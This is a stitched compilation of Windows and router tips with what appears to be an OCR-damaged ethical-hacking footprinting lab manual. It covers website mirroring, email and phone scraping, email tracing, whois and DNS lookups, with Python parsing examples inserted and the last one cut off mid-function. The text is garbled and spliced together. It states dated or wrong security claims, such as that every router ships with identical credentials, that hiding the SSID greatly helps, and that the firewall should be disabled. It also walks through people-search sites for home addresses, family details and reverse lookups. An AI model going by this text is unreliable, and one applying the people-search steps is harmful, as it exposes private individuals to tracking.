Your wireless router's default password should be changed immediately. All wireless routers are shipped with the same administrator user name and password. Changing the user name and password is not only the most important change, it is the easiest. In your wireless router's configuration page, look for a link or setting titled "Admin." If you have any trouble changing this setting, check your wireless router's user guide.

3. Change your SSID and turn off SSID Broadcasting
Your wireless router comes with a default SSID (wireless network name), and one of the first things you should do is change that SSID. By having a non-default SSID, you're making it harder for unauthorized connections to your network. By allowing your SSID to broadcast, you make it easy to add additional devices to your wireless network. However, you also make it easy for anyone with a wireless device to gain access to your network. Leaving broadcasting on is a bit like leaving your car keys in the ignition while you run into the store - you're asking for trouble. When you turn SSID broadcasting off, your wireless devices will have to be configured with the exact SSID that you have specified in your wireless router.

4. Enable WPA
Most new wireless cards and routers support WPA or WPA2 wireless security. Go with the one that you're sure all of your hardware supports. WEP is no longer considered a safe way to secure your data.

5. Limit access by MAC addresses
Every network card, both wired and wireless, has a unique address assigned to it by the manufacturer. This identifier is called a MAC address. By setting your wireless router to only allow connections from specific MAC addresses, you're greatly improving the security of your wireless network. For help figuring out what your network card's MAC address is, please see this FAQ. Once you know each of the MAC addresses for your network cards, check the support web site of your wireless router manufacturer for instructions on using MAC address security.

Disabling Thumbnails
You can delete the file and the thumbnail view will go away, but only for some time before Windows re-creates it. You can prevent this from happening by disabling the thumbnail cache in Folder Options or via a registry hack.
In Explorer, go to Tools, then Folder Options and click on the View tab. Check the box "Do not cache thumbnails" and click OK. Now Windows will not automatically create a THUMBS.DB file for a folder it deems needs thumbnails, which means you can set a folder view to list or detail and it will remain that way. Make sure to first delete the THUMBS.DB file if one existed already. You can still set the display of a folder manually by right-clicking on the folder and choosing Properties. Click on the Customize tab and choose from the list (Documents, Pictures, Photo Album, Music, etc).

Disabling Thumbnails with a Registry Hack
Open the registry editor (regedit.exe) from the Run command and navigate to the following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Double-click the DisableThumbnailCache value in the right-hand pane and change the value to 1. If the value is not there, go to Edit, then New and choose DWORD Value to create one with the same name. Close the Registry Editor and reboot your computer for the changes to take effect. If you have a lot of folders with lots of pictures, it would be best to disable the thumbnail cache, because each picture in the cache is about 2KB, meaning 1000 pictures in one folder would result in a cache of 2MB!

WINDOWS KEY USES
In all honesty, I always thought the "Windows Key" on my keyboard was just a nuisance. It was just the thing I accidentally hit once in a while and the darn Start menu would pop up. Turns out, I was wrong; it has a lot of uses. When used in combination with other keys, here's what you can do:
Windows Key + Tab: Cycle through the buttons in the Task Bar
Windows Key + D: Minimize or restore all windows
Windows Key + E: Launch Windows Explorer
Windows Key + F: Launch Search for Files
Windows Key + Ctrl + F: Launch Search for Computers
Windows Key + F1: Launch the Help and Support Center
Windows Key + R: Launch the Run dialog box
Windows Key + Pause/Break: Launch the System Properties dialog box
Windows Key + M: Minimize all open windows
Windows Key + Shift + M: Undo minimize all windows
Windows Key + L: Lock the workstation
Windows Key + U: Launch the Utility Manager
Windows Key + Ctrl + Tab: According to Microsoft: Moves focus from Start, to the Quick Launch toolbar, to the system tray.

TEMPORARILY DISABLE "RESTART NOW" DIALOG FROM XP'S AUTOMATIC UPDATES
Automatic Updates is a great feature. Your computer stays protected from threats without worrying about it... but if it's 3am and I'm trying to play a video game, the last thing I want is for the automatic updates to pop up and remind me every 5 minutes that I need to reboot, interrupting my game... Drives me crazy!
If you want to temporarily disable this popup message and delay rebooting, you can go about it one of two ways. I'm a command line junkie, so I just type this into a command prompt (make sure you use the quotes):
net stop "automatic updates"
Or you can open Control Panel \ Administrative Tools \ Services and click Stop on Automatic Updates. Do not disable the Automatic Updates service, just stop it. The next time you start up your computer, the service will start again.
Web Site Mirroring: Web mirroring allows you to download a website to a local directory, recursively building all directories, HTML, images, flash, videos, and other files from the server to your computer.

Lab Tasks
1. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop
2. In the Start menu apps, click WinHTTrack to launch the application
3. In the WinHTTrack main window, click Next to create a New Project
4. Enter the project name in the Project name field. Select the Base path to store the copied files. Click Next
5. Enter mtahirzahid.blogspot.com under Web Addresses: (URL) and then click the Set options button
6. Clicking the Set options button will launch the WinHTTrack window
7. Click the Scan Rules tab and select the check boxes for the file types as shown in the following screenshot and click OK
8. Then, click Next
9. By default, the radio button will be selected for Please adjust connection parameters if necessary, then press FINISH to launch the mirroring operation
10. Click Finish to start mirroring the website
11. Site mirroring progress will be displayed as in the following screenshot
12. WinHTTrack shows the message Mirroring operation complete once the site mirroring is completed. Click Browse Mirrored Website
13. Clicking the Browse Mirrored Website button will launch the mirrored website for mtahirzahid.blogspot.com. The URL indicates that the site is located at the local machine. Note: If the web page does not open for some reason, navigate to the directory where you have mirrored the website and open index.html with any web browser
14. A few websites are very large and will take a long time to mirror the complete site
15. If you wish to stop the mirroring process prematurely, click Cancel in the Site mirroring progress window
16. The site will work like a live hosted website.

Lab Analysis
Document the mirrored website directories, getting HTML, images, and other files.
Tool/Utility: HTTrack Web Site Copier
Information Collected/Objectives Achieved: ■ Offline copy of the website mtahirzahid.blogspot.com is created

Questions
5. How do you retrieve the files that are outside the domain while mirroring a website?
6. How do you download ftp files/sites?
7. Can HTTrack perform form-based authentication?
8. Can HTTrack execute HP-UX or ISO 9660 compatible files?
9. How do you grab an email address in web pages?

Web Data Extracting: Web data extraction is a type of information retrieval that can automatically extract unstructured or semi-structured web data sources in a structured manner.

Lab Tasks
1. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop
2. In the Start menu, click Web Data Extractor to launch the application
3. Web Data Extractor's main window appears. Click New to start a new Session
4. Clicking New opens the Session settings window.
5. Type a URL (mtahirzahid.blogspot.com) in the Starting URL field. Select the check boxes for all the options as shown in the screenshot and click OK
6. Click Start to initiate the data extraction
7. Web Data Extractor will start collecting the information (emails, phones, faxes, etc.). Once the data extraction process is completed, an Information dialog box appears. Click OK
8. The extracted information can be viewed by clicking the tabs
9. Select the Meta tags tab to view the URL, Title, Keywords, Description, Host, Domain, and Page size information. Note: if you want WDE to stay within the first page, just select "Process First Page Only". A setting of "0" will process and look for data in the whole website. A setting of "1" will process the index or home page with associated files under the root dir only.
10. Select the Emails tab to view the Email, Name, URL, Title, Host, Keywords density, etc. information related to emails
11. Select the Phones tab to view the information related to phones like Phone number, Source, Tag, etc.
12. Similarly, check for the information under the Faxes, Merged list, Urls (638), and Inactive sites tabs
13. To save the session, go to File and click Save session
14. Specify the session name in the Save session dialog box and click OK
15. By default, the session will be saved at D:\Users\admin\Documents\WebExtractor\Data

Lab Analysis
Document all the Meta Tags, Emails, and Phone/Fax.
Tool/Utility: Web Data Extractor
Information Collected/Objectives Achieved:
Meta tags Information: URL, Title, Keywords, Description, Host, Domain, Page size, etc.
Email Information: Email Address, Name, URL, Title, Host, Keywords density, etc.
Phone Information: Phone numbers, Source, Tag, etc.

Questions
1. What does Web Data Extractor do?
2. How would you resume an interrupted session in Web Data Extractor?
3. Can you collect all the contact details of an organization?

Search Diggity: Search Diggity has a predefined query database that runs against the website to scan the related queries.

Lab Tasks
1. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop
2. In the Start menu, click the Search Diggity icon to launch Search Diggity
3. The Search Diggity main window appears with Google Diggity as the default
4. Select Sites/Domains/IP Ranges and type the domain name in the domain field. Click Add
5. The added domain name will be listed in the box below the Domain field
6. Now, select a Query from the left pane that you wish to run against the website you have added in the list and click Scan. Note: In this lab, we have selected the query SWF Finding Generic. Similarly, you can select other queries to run against the added website
7. The following screenshot shows the scanning process
8. All the URLs that contain the SWF extension will be listed and the output will show the query results

Lab Analysis
Collect the different error messages to determine the vulnerabilities and note the information disclosed about the website.
Tool/Utility: Search Diggity
Information Collected/Objectives Achieved: Many error messages found relating to vulnerabilities

Questions
Is it possible to export the output result for Google Diggity? If yes, how?
Firebug: Firebug is an add-on tool for Mozilla Firefox. Running Firebug displays information such as directory structure, internal URLs, cookies, session IDs, etc.

Lab Tasks
1. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop
2. On the Start menu, click Mozilla Firefox to launch the browser
3. Type the URL https://getfirebug.com in the Firefox browser and click Install Firebug
4. Clicking Install Firebug will redirect to the Download Firebug page. Click the Download link to install Firebug
5. On the Add-Ons page, click the button Add to Firefox to initiate the Add-On installation
6. Click the Install Now button in the Software Installation window
7. Once the Firebug Add-On is installed, it will appear as a grey colored bug on the Navigation Toolbar as highlighted in the following screenshot
8. Click the Firebug icon to view the Firebug pane.
9. Click the Enable link to view the detailed information for the Console panel. Perform the same for the Script, Net, and Cookies panels
10. Enabling the Console panel displays all the requests by the page. The one highlighted in the screenshot is the Headers tab
11. In this lab, we have demonstrated http://www.microsoft.com
12. The Headers tab displays the Response Headers and Request Headers by the website
13. Similarly, the rest of the tabs in the Console panel, like Params, Response, HTML, and Cookies, hold important information about the website
14. The HTML panel displays information such as source code, internal URLs of the website, etc.
15. The Net panel shows the Request start and Request phases start and elapsed time relative to the Request start by hovering the mouse cursor on the Timeline graph for a request
16. Expand a request in the Net panel to get detailed information on Params, Headers, Response, Cached, and Cookies. The screenshot that follows shows the Cache information
17. Expand a request in the Cookies panel to get information on a cookie Value, Raw data, JSON, etc.
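What the Headers and Cookies panels show in this lab can also be read straight from a raw HTTP response. The block below is an added example, not Firebug's code and not from the page: it splits a response into status line, headers and body, pulls out the headers that disclose the server stack (the lab records Microsoft-IIS/7.5 and ASP.NET for this site), and checks each Set-Cookie for the HttpOnly and Secure attributes that keep a session ID out of reach of page scripts and plaintext connections. The response is constructed; the header names are standard, the cookie values made up.

```python
"""Read a raw HTTP response the way the Firebug Headers and Cookies panels do.

Added example for the Firebug lab; it is not Firebug code and opens no
network connection. The response below is constructed to match the stack the
lab recorded (IIS/7.5 with ASP.NET); cookie values are made up.
"""
from typing import Dict, List, Tuple

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 4.0.30319\r\n"
    "Set-Cookie: ASP.NET_SessionId=abc123; path=/; HttpOnly\r\n"
    "Set-Cookie: prefs=dark; path=/\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)

# Headers that reveal the server stack: what the lab lists under "Server on
# which the website is hosted" and "Development Framework".
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")


def parse_response(raw: str) -> Tuple[str, List[Tuple[str, str]], str]:
    """Split a raw response into (status line, [(name, value), ...], body).
    Headers stay a list, not a dict, because Set-Cookie may repeat."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def stack_fingerprint(headers) -> Dict[str, str]:
    """The disclosure headers present in the response, lower-cased names."""
    return {name: value for name, value in headers if name in FINGERPRINT_HEADERS}


def cookie_findings(headers, served_over_https: bool = True) -> List[str]:
    """Cookies missing HttpOnly (readable by page scripts) or, on an HTTPS
    site, Secure (would also be sent over plain HTTP)."""
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attrs:
            findings.append(f"{cookie}: missing HttpOnly")
        if served_over_https and "secure" not in attrs:
            findings.append(f"{cookie}: missing Secure")
    return findings


if __name__ == "__main__":
    status, hdrs, _ = parse_response(SAMPLE_RESPONSE)
    print(status, stack_fingerprint(hdrs))
    print("\n".join(cookie_findings(hdrs)))
```

On a real site the same checks apply to the Response Headers text that the Headers tab shows: the Server and X-Powered-By values are the first thing to consider removing from a server you administer, and a session cookie without HttpOnly is the finding that matters most in the Cookies panel.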
Note: You can find information related to the CSS, Script, and DOM panels on the respective tabs.

Lab Analysis
Collect information such as internal URLs, cookie details, directory structure, session IDs, etc. for different websites using Firebug.
Tool/Utility: Firebug
Information Collected/Objectives Achieved:
Server on which the website is hosted: Microsoft-IIS/7.5
Development Framework: ASP.NET
HTML Source Code using JavaScript, jQuery, Ajax
Other Website Information: ■ Internal URLs ■ Cookie details ■ Directory structure ■ Session IDs

Questions
1. Determine the Firebug error message that indicates a problem.
2. After editing pages within Firebug, how can you output all the changes that you have made to a site's CSS?
3. In the Firebug DOM panel, what do the different colors of the variables mean?
4. What do the different colored lines indicate in the Timeline request in the Net panel?

eMailTrackerPro: Overview of eMailTrackerPro
Email tracking is a method to monitor or spy on email delivered to the intended recipient:
■ When an email message was received and read
■ If destructive email is sent
■ The GPS location and map of the recipient
■ The time spent reading the email
■ Whether or not the recipient visited any links sent in the email
■ PDFs and other types of attachments
■ If messages are set to expire after a specified time

Lab Tasks
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop
2. On the Start menu, click eMailTrackerPro to launch the application
3. Click OK if the Edition Selection pop-up window appears
4. Now you are ready to start tracing email headers with eMailTrackerPro
5. Click the Trace an email option to start the trace
6. Clicking Trace an email will direct you to the eMailTrackerPro by Visualware window
7. Select Trace an email I have received. Now, copy the email header from the email you wish to trace and paste it in the Email headers field under Enter Details and click Trace
Note: In Outlook, find the email header by following these steps:
■ Double-click the email to open it in a new window
■ Click the small arrow in the lower-right corner of the Tags toolbar box to open the Message Options information box
■ Under Internet headers, you will find the Email header, as displayed in the screenshot
8. Clicking the Trace button will direct you to the Trace report window
9. The email location is traced in a GUI world map. The location and IP addresses may vary. You can also view the summary by selecting the Email Summary section on the right side of the window
10. The Table section right below the Map shows the entire Hop in the route with the IP and suspected locations for each hop
11. The IP address might be different than the one shown in the screenshot
12. You can view the complete trace report on the My Trace Reports tab
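The hop table that eMailTrackerPro builds comes from the Received: headers in the Internet headers block described above. The block below is an added example, not the tool's code and not from the page: it parses a message with Python's standard email module, lists the hops oldest-first (Received: headers are prepended as the message travels, so the bottom one is the first hop), extracts the sender-side address, and computes total transit time. It also shows the caveat a trace report cannot: only the headers written by servers you trust are reliable, since everything below them is text the sender supplied. The message is constructed; every hostname, address (documentation ranges 192.0.2.0/24 and 198.51.100.0/24) and timestamp is made up.

```python
"""Reconstruct an e-mail's delivery path from its Received: headers.

Added example for the eMailTrackerPro section; not the tool's code. The
headers below are constructed (documentation-range addresses, invented
hosts) but use the usual "from HELO (rDNS [IP]) by SERVER ...; DATE" form.
"""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime
from typing import Dict, List, Optional

SAMPLE_HEADERS = (
    "Received: from mx.example.net (mx.example.net [198.51.100.7])\n"
    "\tby inbound.example.org with ESMTPS id abc123\n"
    "\tfor <alice@example.org>; Mon, 01 Jan 2024 10:00:05 +0000\n"
    "Received: from relay.example.com (relay.example.com [192.0.2.10])\n"
    "\tby mx.example.net with ESMTP; Mon, 01 Jan 2024 10:00:02 +0000\n"
    "Received: from [192.0.2.55] (unknown [192.0.2.55])\n"
    "\tby relay.example.com with ESMTPA; Mon, 01 Jan 2024 09:59:58 +0000\n"
    "From: Bob <bob@example.com>\n"
    "To: alice@example.org\n"
    "Subject: test\n"
    "\n"
    "body\n"
)

# "from HELO (rDNS [IP]) ... by SERVER"; the rDNS part is optional because
# some mail servers omit it.
HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[\d.]+)\]\)"
    r".*?\bby\s+(?P<by>\S+)",
    re.S,
)


def delivery_path(raw_message: str) -> List[Dict]:
    """Hops oldest-first: each is the server in 'by' receiving from 'from'."""
    msg = message_from_string(raw_message)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        m = HOP_RE.search(value)
        if not m:
            continue                       # e.g. local submission, no [IP]
        stamp = value.rsplit(";", 1)[-1].strip() if ";" in value else ""
        try:
            when = parsedate_to_datetime(stamp)
        except (TypeError, ValueError):
            when = None
        hops.append({**m.groupdict(), "time": when})
    return hops


def origin_ip(hops) -> Optional[str]:
    """Address the earliest hop received from; see trusted_hops for the caveat."""
    return hops[0]["ip"] if hops else None


def trusted_hops(hops, own_servers) -> List[Dict]:
    """Drop every hop before the first one written by a server you operate:
    headers below that point were supplied by the sender and can be forged."""
    for i, hop in enumerate(hops):
        if hop["by"] in own_servers:
            return hops[i:]
    return []


def transit_seconds(hops) -> Optional[float]:
    stamps = [h["time"] for h in hops if h["time"] is not None]
    return (stamps[-1] - stamps[0]).total_seconds() if len(stamps) > 1 else None


def helo_mismatches(hops) -> List[str]:
    """IPs whose HELO name differs from their reverse DNS name: not proof of
    anything, but the kind of inconsistency worth noting in a trace report."""
    return [h["ip"] for h in hops
            if h["rdns"] is not None and h["helo"].strip("[]") != h["rdns"]]


if __name__ == "__main__":
    path = delivery_path(SAMPLE_HEADERS)
    for hop in path:
        print(f"{hop['ip']:>15}  ->  {hop['by']}  at {hop['time']}")
    print("origin:", origin_ip(path), "transit:", transit_seconds(path), "s")
```

Run against the sample, the earliest hop is the unnamed host 192.0.2.55 handing the message to relay.example.com; `trusted_hops(path, {"inbound.example.org"})` keeps only the hop your own server recorded, which is the one an investigator can actually rely on.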
Lab Analysis
Document all the live emails discovered during the lab with all additional information.
Tool/Utility: eMailTrackerPro
Information Collected/Objectives Achieved:
Map: Location of traced email in GUI map
Table: Hop in the route with IP
Email Summary: Summary of the traced email ■ From & To email address ■ Date ■ Subject ■ Location
Trace Information: ■ Subject ■ Sender IP ■ Location

Questions
1. What is the difference between tracing an email address and tracing an email message?
2. What are email Internet headers?
3. What does "unknown" mean in the route table of the identification report?
4. Does eMailTrackerPro work with email messages that have been forwarded?
5. Evaluate whether an email message can be traced regardless of when it was sent.

Network Route Trace: Needs: You can also download the latest version of Path Analyzer Pro from the link http://www.pathanalyzer.com/download.opp. Install this tool on Windows Server 2012
■ Double-click PAPro27.msi
■ Follow the wizard-driven installation to install it
■ Administrator privileges to run Path Analyzer Pro
1. Follow the wizard-driven installation steps to install Path Analyzer Pro
2. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop
3. To launch Path Analyzer Pro, click Path Analyzer Pro in apps
4. Click the Evaluate button on the Registration Form
5. The main window of Path Analyzer Pro appears as shown in the following screenshot
6. Select the ICMP protocol in the Standard Options section.
7. Under Advanced Probe Details, check the Smart option in the Length of packet section and leave the rest of the options in this section at their default settings.
Note: The firewall is required to be disabled for appropriate output
8. In the Advanced Tracing Details section, the options remain at their default settings.
9. Check Stop on control messages (ICMP) in the Advanced Tracing Details section
10. To perform the trace after checking these options, select the target host, for instance www.google.com, and check the Port: Smart as default (65535).
11. In the drop-down menu, select the duration of time as Timed Trace
12. Enter the Type time of trace in the previously mentioned format as HH:MM:SS.
13. While Path Analyzer Pro performs this trace, the Trace tab changes automatically to Stop.
14. To see the trace results, click the Report tab to display a linear chart depicting the number of hops between you and the target.
15. Click the Synopsis tab, which displays a one-page summary of your trace results.
16. Click the Charts tab to view the results of your trace.
17. Click Geo, which displays an imaginary world map format of your trace.
18. Now, click the Stats tab, which features the Vital Statistics of your current trace.
19. Now export the report by clicking Export on the toolbar.
20. By default, the report will be saved at D:\Program Files (x86)\Path Analyzer Pro 2.7. However, you may change it to your preferred location.
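The Stats tab above and Question 1 below turn on the per-hop figures a trace report derives from its probes: hop count, which hops answered, mean round-trip time, and the standard deviation of that time (jitter). The block below is an added example, not Path Analyzer Pro's code and not from the page; it sends no packets. It parses the text that Windows tracert prints (a constructed sample with documentation-range addresses, and a hop that times out) and computes those figures with the standard library, so the numbers behind a report can be reproduced from any saved trace.

```python
"""Per-hop latency statistics from a saved round-trip trace.

Added example for the Network Route Trace section; not Path Analyzer Pro's
code, and it sends no packets. It parses Windows tracert output (the sample
is constructed, with documentation-range addresses) and reports per-hop mean
RTT, standard deviation (jitter) and loss.
"""
import re
import statistics
from typing import Dict, List, Optional

# Constructed tracert output; 192.168.1.1 is a typical home gateway address.
SAMPLE_TRACERT = """\
Tracing route to www.example.com [203.0.113.50]
over a maximum of 30 hops:

  1     1 ms     1 ms     1 ms  192.168.1.1
  2    12 ms    15 ms    11 ms  198.51.100.1
  3     *        *        *     Request timed out.
  4    25 ms    24 ms    90 ms  203.0.113.5
  5    26 ms    27 ms    26 ms  203.0.113.50

Trace complete.
"""

HOP_LINE_RE = re.compile(r"^\s*(\d+)\s+(.*)$")
# One probe result: a lost probe "*" or a time such as "12 ms" / "<1 ms".
PROBE_RE = re.compile(r"(\*|<?\d+ ms)")


def parse_tracert(text: str) -> List[Dict]:
    """Return [{hop, rtts, target}] with rtts in ms (None for a lost probe)."""
    hops = []
    for line in text.splitlines():
        m = HOP_LINE_RE.match(line)
        if not m:
            continue
        probes = list(PROBE_RE.finditer(m.group(2)))[:3]
        if len(probes) < 3:
            continue                               # not a hop line
        rtts: List[Optional[float]] = []
        for p in probes:
            token = p.group(1)
            # "<1 ms" is counted as 1 ms: tracert's own resolution limit
            rtts.append(None if token == "*" else float(token.lstrip("<").split()[0]))
        hops.append({"hop": int(m.group(1)), "rtts": rtts,
                     "target": m.group(2)[probes[-1].end():].strip()})
    return hops


def hop_stats(hop: Dict) -> Dict[str, Optional[float]]:
    """Mean, population standard deviation and loss ratio for one hop."""
    samples = [r for r in hop["rtts"] if r is not None]
    loss = 1 - len(samples) / len(hop["rtts"])
    if not samples:
        return {"mean": None, "stdev": None, "loss": loss}
    return {"mean": statistics.mean(samples),
            "stdev": statistics.pstdev(samples), "loss": loss}


def unresponsive_hops(hops) -> List[int]:
    """Hops that answered none of the probes. A trace that dies on hop 1 or 2
    usually means a local firewall or router is dropping the probes."""
    return [h["hop"] for h in hops if hop_stats(h)["loss"] == 1.0]


def noisiest_hop(hops) -> Optional[int]:
    """Hop with the largest RTT standard deviation (most jitter); when it is
    large, the mean latency alone misrepresents that hop."""
    measured = [(hop_stats(h)["stdev"], h["hop"]) for h in hops
                if hop_stats(h)["stdev"] is not None]
    return max(measured)[1] if measured else None


if __name__ == "__main__":
    trace = parse_tracert(SAMPLE_TRACERT)
    for h in trace:
        s = hop_stats(h)
        print(h["hop"], h["target"], s)
    print("unresponsive:", unresponsive_hops(trace), "noisiest:", noisiest_hop(trace))
```

In the sample, hop 4 has a mean of about 46 ms but a standard deviation of about 31 ms because one probe took 90 ms; that spread, not the mean, is what tells you the hop is unstable, which is the point of the standard deviation figure in a trace report.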
Analysis point:-
Document the IP addresses that are traced for the lab for further information. Tool/Utility Information Collected/Objectives Achieved Path Analyzer Pro Report: Mail:mtahirzahid@yahoo.com
Page 190
Power Of Hacking ■ Number of hops ■ IP address ■ Hostname יASN ■ Network name ■ Latency Synopsis: Displays summary of valuable information 011 DNS, Routing, Registries, Intercept Charts: Trace results 111 the form of chart Geo: Geographical view of the path traced Stats: Statistics of the trace Questions 1. What is die standard deviation measurement, and why is it important? 2. If your trace fails on the first or second hop, what could be the problem? 3. Depending on your TCP tracing options, why can't you get beyond my local network? SmartWhois:1. Follow the wizard-driven installation steps and install SmartWhois. 2. To launch the Start menu, hover the mouse cursor 111 the lower-left corner of the desktop 3. To launch SmartWhois, click SmartWhois 111 apps 4. The SmartWhois main window appears
Mail:mtahirzahid@yahoo.com
Page 191
Power Of Hacking
5. Type an IP address, hostname, or domain name 111 the field tab. An example of a domain name query is shown as follows, .www.google.com 6. Now, click the Query tab to find a drop-down list, and then click As Domain to enter domain name 111 the field.
7. 111 the left pane of the window, the result displays, and the right pane
Mail:mtahirzahid@yahoo.com
Page 192
Power Of Hacking displays die results of your query.
8. Click the Clear icon 111 the toolbar to clear die history.
9. To perform a sample host name query, type www.facebook.com. 10. Click the Query tab, and then select As IP/Hostname and enter a hostname in field. 11. 111 the left pane of the window, the result displays, and 111 the right
Mail:mtahirzahid@yahoo.com
Page 193
Power Of Hacking pane, the text area displays the results of your query.
12. Click the Clear icon 111 the toolbar to clear the history. 13. To perform a sample IP Address query, type the IP address 10.0.0.3 (Windows 8 IP address) 111 the IP, host or domain field. 14. 111 the left pane of the window, the result displays, and 111 the right pane, the text area displays the results of your query.
Lab Analysis Document all the IP addresses/hostnames for the lab lor further information. Mail:mtahirzahid@yahoo.com
Page 194
Power Of Hacking Tool/Utility Information Collected/Objectives Achieved SmartWhois Domain name query results: Owner of the website Host name query results: Geographical location of the hosted website IP address query results: Owner of the IP address Block Questions 1. Determine whether you can use SmartWhois if you are behind a firewall or a proxy server. 2. Why do you get Connection timed out or Connection failed errors? 3. Is it possible to call SmartWhois direcdy from my application? If yes, how? 4. What are LOC records, and are they supported by SmartWhois? 5. When running a batch query, you get only a certain percentage of the domains/IP addresses processed. Why are some of the records unavailable? Spokeo:1-Launch the Start menu by hovering the mouse cursor 111 the lower-left corner of the desktop 2. Click the Google Chrome app to launch the Chrome browser 3. Open a web browser, type http://www.spokeo.com, and press Enter 011 die
Mail:mtahirzahid@yahoo.com
Page 195
Power Of Hacking
keyboard die search, input die name of die person you want to search for 111
4. To begin
die Name field and click Search
5. Spokeo redirects you to search results widi die name you have entered
Mail:mtahirzahid@yahoo.com
Page 196
Power Of Hacking
6- Click the state name in which person you are searching lives
7- Now, click the appropriate City name for your search
8. Search results displaying die Address. Phone Number Email Address. City
Mail:mtahirzahid@yahoo.com
Page 197
Power Of Hacking
and State, etc. Search results displaying die Location History
9.
10. Spokeo search results display die Family Background, Family Economic Health and Family Lifestyle
11. Spokeo search results display die Neighborhood tor the search done Mail:mtahirzahid@yahoo.com
12. Similarly, perform a Reverse search by giving phone number, address, email address, etc. in the Search field to find details of a key person or an organization
Analysis
Analyze and document all the results discovered in the lab exercise.
Tool/Utility: Spokeo
Information Collected/Objectives Achieved:
■ Profile Details: Current Address, Phone Number, Email Address, Marital Status, Education, Occupation
■ Location History: Information about where the person has lived and detailed property information
■ Family Background: Information about household members for the person you searched
■ Photos & Social Profiles: Photos, videos, and social network profiles
■ Neighborhood: Information about the neighborhood
■ Reverse Lookup: Detailed information for the search done using phone numbers
Questions
1. How do you collect all the contact details of key people using Spokeo?
2. Is it possible to remove your residential listing? If yes, how?
3. How can you perform a reverse search using Spokeo?
4. List the kind of information that a reverse phone search and email search will yield.
AnyWho: AnyWho is a part of the AT&T family of brands, which mostly focuses on local searches for products and services. The site lists information from the White Pages (Find a Person/Reverse Lookup) and the Yellow Pages (Find a Business).
Lab Tasks
1. Launch Start menu by hovering the mouse cursor on the lower-left corner of the desktop
2. Click the Google Chrome app to launch the Chrome browser, or any other browser
3. In the browser, type http://www.anywho.com, and press Enter on the keyboard
4. Input the name of the person you want to search for in the Find a Person section and click Find. AnyWho redirects you to search results with the name you have entered.
5. The number of results might vary
6. Click the search results to see the address details and phone number of that person
7. Similarly, perform a reverse search by giving phone number or address in the Reverse Lookup field
8. Reverse lookup will redirect you to the search result page with the detailed information of the person for a particular phone number or email address
Lab Analysis
Analyze and document all the results discovered in the lab exercise.
Tool/Utility: AnyWho
Information Collected/Objectives Achieved:
■ WhitePages (Find people by name): Exact location of a person with address and phone number
■ Get Directions: Precise route to the address found for a person
■ Reverse Lookup (Find people by phone number): Exact location of a person with complete address
Questions
1. Can you collect all the contact details of the key people of any organization?
2. Can you remove your residential listing? If yes, how?
3. If you have an unpublished listing, why does your information show up in AnyWho?
4. Can you find a person in AnyWho that you know has been at the same location for a year or less? If yes, how?
5. How can a listing be removed from AnyWho?
Nslookup:
1. Launch Start menu by hovering the mouse cursor in the lower-left corner of the desktop
2. Click the Command Prompt app to open the command prompt window
3. In the command prompt, type nslookup, and press Enter
4. Now, type help and press Enter. The displayed response should be similar to the one shown in the following figure
5. In the nslookup interactive mode, type set type=a and press Enter
6. Now, type www.certifiedhacker.com and press Enter. The displayed response should be similar to the one shown in the following figure
Note: The DNS server address (202.53.8.8) will be different from the one shown in the screenshot
7. You get an Authoritative or Non-authoritative answer. The answer varies, but in this lab, it is a Non-authoritative answer
8. In nslookup interactive mode, type set type=cname and press Enter
9. Now, type certifiedhacker.com and press Enter
Note: The DNS server address (8.8.8.8) will be different from the one in the screenshot
10. The displayed response should be similar to the one shown as follows:
> set type=cname
> tahir.com
Server: google-public-dns-a.google.com
Address: 8.8.8.8
11. In nslookup interactive mode, type server 64.147.99.90 (or any other IP address you receive in the previous step) and press Enter.
12. Now, type set type=a and press Enter.
13. Type www.certifiedhacker.com and press Enter. The displayed response should be similar to the one shown in the following figure.
14. If you receive a request timed out message, as shown in the previous figure, then your firewall is preventing you from sending DNS queries outside your LAN.
15. In nslookup interactive mode, type set type=mx and press Enter.
16. Now, type tahirhacker.com and press Enter. The displayed response should be similar to the one shown in the following figure.
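The nslookup steps above switch between A, CNAME and MX queries and distinguish authoritative from non-authoritative answers. As an added example that is not part of the original lab, the following Python builds those same queries on the wire (RFC 1035) and decodes a constructed resolver reply, including the AA flag behind step 7's distinction. The domain names, addresses and transaction id are assumed sample values.

```python
"""Added example (not the page's code): nslookup's `set type=a|cname|mx` queries on the
wire and the decoding of the reply it prints. Runs offline against a hand-constructed
reply; every name, address and id below is a constructed sample value."""
import random
import struct

QTYPE = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "PTR": 12, "MX": 15}
TYPE_NAME = {v: k for k, v in QTYPE.items()}


def encode_name(name):
    """'www.example.test' -> length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError("bad label length in %r" % name)
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype="A", txid=None):
    """One-question query with RD set, as nslookup sends; returns (txid, bytes)."""
    if txid is None:
        txid = random.randrange(0, 0x10000)   # the reply must echo this id back
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: QR=0, RD=1
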